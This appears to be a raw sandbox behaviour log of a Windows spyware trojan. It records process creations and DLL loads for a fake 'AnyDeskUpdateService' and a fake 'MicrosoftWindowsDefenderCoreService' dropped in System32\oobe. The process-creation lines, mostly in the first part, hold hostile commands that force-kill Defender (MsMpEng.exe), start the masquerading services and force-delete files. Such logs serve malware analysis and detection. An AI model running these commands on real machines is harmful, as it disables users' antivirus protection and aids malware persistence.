Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: wininet.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: wldp.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: propsys.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: profapi.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: edputil.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: netutils.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: slc.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: userenv.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: sppc.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: mpr.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: wininet.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: wldp.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: propsys.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: profapi.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: edputil.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: netutils.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: slc.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: userenv.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: sppc.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: mpr.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: schannel.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: wininet.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: wldp.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: propsys.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: profapi.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: edputil.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: netutils.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: slc.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: userenv.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: sppc.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: mpr.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
